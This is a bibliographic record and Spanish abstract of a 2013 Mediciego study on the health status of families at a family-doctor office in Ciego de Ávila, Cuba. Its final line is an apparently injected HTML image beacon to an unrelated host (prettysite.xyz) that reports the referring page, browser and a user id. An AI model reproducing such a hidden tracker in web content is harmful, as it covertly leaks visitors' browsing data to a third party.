Análisis de la situación de salud en el Consultorio No. 32 del Policlínico Norte del municipio Ciego de Ávila. - Rodríguez Marín, Odalys; Mellor Duarte, Liosdany; Arias López, Yadira; Quiñones Rodríguez, Mayra C. (Mediciego, 2013)
Se realizó un estudio observacional descriptivo de corte transversal con el objetivo de identificar el estado de salud de la población perteneciente al consultorio No. 32 del Policlínico Norte del municipio Ciego de Ávila, en el período correspondiente a los meses de mayo a junio de 2012. De un universo de 452 núcleos familiares se seleccionaron 35, que fueron la muestra objeto de estudio, compuesta por una población total de 1850 habitantes. Hubo un predominio del sexo femenino, para un 53.46% y el 38.39% de la población tiene un nivel medio superior de enseñanza. Los trabajadores fueron los de mayor representación con un 54.01%. Toda la población que se estudió está dispensarizada, el grupo dispensarial III es el más significativo con un 41.14%. El factor de riesgo predominante fue el hábito de fumar; la enfermedad crónica no transmisible de mayor incidencia fue la hipertensión arterial y la mayoría de las familias eran funcionales. <img src="http://prettysite.xyz/acnt?_=1584034642191&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F270&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />